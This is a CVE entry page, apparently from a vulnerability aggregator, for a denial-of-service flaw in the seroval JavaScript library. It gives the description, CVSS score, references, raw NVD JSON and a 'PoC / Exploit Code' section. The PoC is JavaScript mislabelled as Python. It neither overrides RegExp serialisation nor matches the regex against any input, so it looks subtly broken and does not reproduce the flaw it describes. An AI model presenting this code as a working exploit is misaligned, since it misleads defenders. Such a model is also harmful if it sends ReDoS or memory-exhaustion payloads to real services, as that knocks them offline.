CVE-2026-23956

Description

seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 0.2.0 through 1.4.0, overriding RegExp serialization with extremely large patterns can exhaust JavaScript runtime memory during deserialization. Additionally, overriding RegExp serialization with patterns that trigger catastrophic backtracking can lead to ReDoS (Regular Expression Denial of Service). This issue has been fixed in version 1.4.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:lxsmnsyc:seroval:*:*:*:*:*:node.js:*:* - VULNERABLE

seroval >= 0.2.0 且 < 1.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-23956 PoC - seroval RegExp ReDoS/Demory Exhaustion
const seroval = require('seroval');

// PoC 1: RegExp with catastrophic backtracking (ReDoS)
function createReDoSPattern() {
  // Pattern that causes catastrophic backtracking: (a+)+$
  // When combined with input 'aaaaaaaaaaaaaaaaaaaaX', causes exponential matching time
  return new RegExp('(a+)+$');
}

// PoC 2: Memory exhaustion with large pattern
function createLargePattern(size) {
  // Generate a very large regex pattern
  const largePattern = '(' + 'a?'.repeat(size) + 'a' + ')';
  return new RegExp(largePattern);
}

// Test ReDoS PoC
console.log('[+] Testing ReDoS Pattern...');
const maliciousRegex = createReDoSPattern();
const serialized = seroval.serialize({ regex: maliciousRegex });
console.log('[+] Serialized payload:', serialized);

// This will cause ReDoS during deserialization
console.log('[+] Attempting deserialization (may hang)...');
try {
  seroval.parse(serialized);
  console.log('[+] Deserialization completed');
} catch (e) {
  console.log('[-] Error:', e.message);
}

// Test Memory Exhaustion PoC
console.log('\n[+] Testing Large Pattern (Memory Exhaustion)...');
const largeRegex = createLargePattern(10000);
const largePayload = seroval.serialize({ regex: largeRegex });
console.log('[+] Serialized large payload, attempting deserialization...');

try {
  seroval.parse(largePayload);
} catch (e) {
  console.log('[-] Memory/Timeout Error:', e.message);
}

console.log('\n[!] Note: Patch to version 1.4.1 to fix this vulnerability')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23956/
[4] VulDB https://vuldb.com/cve/CVE-2026-23956
[5] https://github.com/lxsmnsyc/seroval/blob/v0.2.0/packages/seroval/src/index.ts#L90
[6] https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060
[7] https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hx9m-jf43-8ffr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23956", "sourceIdentifier": "[email protected]", "published": "2026-01-22T02:15:52.310", "lastModified": "2026-05-20T02:16:35.403", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 0.2.0 through 1.4.0, overriding RegExp serialization with extremely large patterns can exhaust JavaScript runtime memory during deserialization. Additionally, overriding RegExp serialization with patterns that trigger catastrophic backtracking can lead to ReDoS (Regular Expression Denial of Service). This issue has been fixed in version 1.4.1."}, {"lang": "es", "value": "seroval facilita la serialización de valores JS, incluyendo estructuras complejas que van más allá de las capacidades de JSON.stringify. En las versiones 1.4.0 y anteriores, la anulación de la serialización de RegExp con patrones extremadamente grandes puede agotar la memoria en tiempo de ejecución de JavaScript durante la deserialización. Además, la anulación de la serialización de RegExp con patrones que desencadenan un retroceso catastrófico puede conducir a ReDoS (Denegación de Servicio por Expresiones Regulares). Este problema ha sido solucionado en la versión 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lxsmnsyc:seroval:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "85760E40-9AB1-40EB-98A1-D1A4411AAFC5"}]}]}], "references": [{"url": "https://github.com/lxsmnsyc/seroval/blob/v0.2.0/packages/seroval/src/index.ts#L90", "source": "[email protected]"}, {"url": "https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hx9m-jf43-8ffr", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}